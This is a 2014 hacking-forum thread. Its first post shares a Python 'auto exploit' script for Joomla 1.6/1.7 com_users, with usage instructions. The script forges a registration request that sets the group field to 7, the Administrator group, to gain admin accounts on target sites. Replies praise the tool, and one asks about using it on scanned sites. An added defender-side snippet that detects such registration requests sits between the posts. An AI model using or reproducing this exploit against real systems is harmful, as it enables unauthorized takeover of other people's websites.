Joomla Com_User Auto Exploiter Python



04-27-2014, 06:53 AM #1
xSecurity Offline Respected *****
Respected
Posts:31 Threads:11 Joined:Oct 2013 Reputation: 3
Mood: Angry
Hello Guys

Automatic Exploit Com_User On Joomla [1.6|1.7]

Video On YouTube
http://www.youtube.com/watch?v=SHbTNPpx4_0

Pastebin
http://pastebin.com/MQWFJC1T

Source :
PHP Code:
#!/usr/bin/python
# Joomla Com_User Auto Exploit =D
# By xSecurity

import requests as sec4everreurllibsysos
from threading import Thread 
from time import sleep
def cls
():
    
os.system(['clear','cls'][os.name =='nt'])

cls()
print 
'''
       __                      _ _         
__  __/ _\ ___  ___ _   _ _ __(_) |_ _   _ 
\ \/ /\ \ / _ \/ __| | | | '
__| | __| | | |
 >  < 
_\ \  __/ (__| |_| | |  | | |_| |_| |
/
_/\_\\__/\___|\___|\__,|_|  |_|\__|\__, |
                                     |
___/Joomla [Com_UserAuto Exploit =D
#Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
#Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin 
Special For My Lov3r Cyber-Crystal
#Note: U Need Install Requests Package: http://www.youtube.com/ watch?v=Ng5T18HyA-Q'''

pwd2 'fio3jfiej9cewc9c9w0eufew9u'
def one(target,pwd1,pwd2,email):
    
# Wrong Password
    
x1 xsec.get(target+'/index.php?option=com_users&view=registration')
    
token re.findall('type="hidden" name="(.*?)" value="1"'x1.text)
    
post = {}
    
post["jform[name]"] = 'xSecurity'
    
post["jform[username]"] = user
    post
["jform[password1]"] = pwd1
    post
["jform[password2]"] = pwd2
    post
["jform[email1]"] = email
    post
["jform[email2]"] = email
    post
["jform[groups][]"] = "7"
    
post["option"] = "com_users"
    
post["task"] = "registration.register"
    
post[token[0]] = "1"
    
p1 xsec.post(target+'/index.php?option=com_users&view=registration'data=urllib.urlencode(post))
    
x2 xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

def exploit(target,pwd1,pwd2,email):
    
# Wrong Password
    
x3 xsec.get(target+'/index.php?option=com_users&view=registration')
    
token re.findall('type="hidden" name="(.*?)" value="1"'x3.text)
    
post = {}
    
post["jform[name]"] = 'xSecurity'
    
post["jform[username]"] = user
    post
["jform[password1]"] = pwd1
    post
["jform[password2]"] = pwd1
    post
["jform[email1]"] = email
    post
["jform[email2]"] = email
    post
["jform[groups][]"] = "7"
    
post["option"] = "com_users"
    
post["task"] = "registration.register"
    
post[token[0]] = "1"
    
p2 xsec.post(target+'/index.php?option=com_users&view=registration'data=urllib.urlencode(post))
    
x4 xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

xsec sec4ever.session()
if 
len(sys.argv) == 5:
    
target sys.argv[1]
    
user sys.argv[2]
    
pwd1 sys.argv[3]
    
email sys.argv[4]
    
one(target,pwd1,pwd2,email)
    
ex exploit(target,pwd1,pwd2,email)
    print 
'[*] Go To Your Email & Active Then Login =D\nUsername: '+user+' & Password: '+pwd1
else:
    print 
"Usage: python tool.py http://target.com/j0s/ youruser yourpass yourmail" 

All The Best =D
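
A defender-side check for the request shape the script above sends (a com_users registration POST that carries `jform[groups][]`), added here as an example and not part of the original post. The record layout and sample data are constructed, and the check assumes the stock registration form never submits a groups field.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed sample records (method, URI, form-encoded body), e.g. from a
# WAF or reverse-proxy audit log that captures request bodies.
SAMPLE_RECORDS = [
    ("POST", "/index.php?option=com_users&view=registration",
     "jform%5Bname%5D=Alice&jform%5Busername%5D=alice&jform%5Bpassword1%5D=a"
     "&jform%5Bpassword2%5D=a&jform%5Bemail1%5D=a%40example.org"
     "&option=com_users&task=registration.register"),
    ("POST", "/index.php?option=com_users&view=registration",
     "jform%5Bname%5D=x&jform%5Busername%5D=x&jform%5Bpassword1%5D=a"
     "&jform%5Bpassword2%5D=b&jform%5Bgroups%5D%5B%5D=7"
     "&option=com_users&task=registration.register"),
    ("GET", "/index.php?option=com_users&view=registration", ""),
]

def is_registration_post(method, uri, fields):
    """True for a com_users registration submission (query string or body)."""
    params = dict(parse_qsl(urlsplit(uri).query))
    params.update(fields)
    return (method.upper() == "POST"
            and params.get("option") == "com_users"
            and (params.get("task") == "registration.register"
                 or params.get("view") == "registration"))

def group_fields(body):
    """Return (key, value) pairs that try to set group membership."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return [(k, v) for k, v in pairs if k.lower().startswith("jform[groups]")]

def scan(records):
    """Return one finding per registration POST that carries group fields."""
    findings = []
    for method, uri, body in records:
        fields = dict(parse_qsl(body, keep_blank_values=True))
        hits = group_fields(body)
        if hits and is_registration_post(method, uri, fields):
            # The script's first request deliberately sends mismatched passwords.
            mismatch = fields.get("jform[password1]") != fields.get("jform[password2]")
            findings.append({"uri": uri, "groups": [v for _, v in hits],
                             "password_mismatch": mismatch})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f)
```

Plain access logs do not record POST bodies, so this only works on sources that capture them; the same condition can be expressed as a WAF rule that rejects the request outright.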

04-27-2014, 07:17 AM #2
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
wow is amazing good job bro

but is com_users no com_user

04-27-2014, 04:18 PM #3
xSecurity Offline Respected *****
Respected
Posts:31 Threads:11 Joined:Oct 2013 Reputation: 3
Mood: Angry
(04-27-2014, 07:17 AM)CrashBandicot Wrote:  wow is amazing good job bro

but is com_users no com_user
lol its same Biggrinsmiley
1+1=99 Cool

04-27-2014, 11:18 PM #4
the nightmare Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:301 Threads:49 Joined:Apr 2014 Reputation: 8
Mood: Hacker
nice share bro

05-12-2014, 12:50 AM #5
_Defender_ Offline Junior Member **
Registered
Posts:23 Threads:8 Joined:May 2014 Reputation: 0
Mood: Excited
Great Tool Biggrinsmiley
Bro I m using Ur Tool "Com_user Scanner"
Which Gives Vulnerable sites Biggrinsmiley
These Site Are 100% vulnerable ? or this tool Scan only that sites which have Com_users component ?

06-10-2014, 02:33 PM #6
Rebelss Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Jun 2014 Reputation: 0
Mood: Heartbroken
nice broda Biggrinsmiley Biggrinsmiley





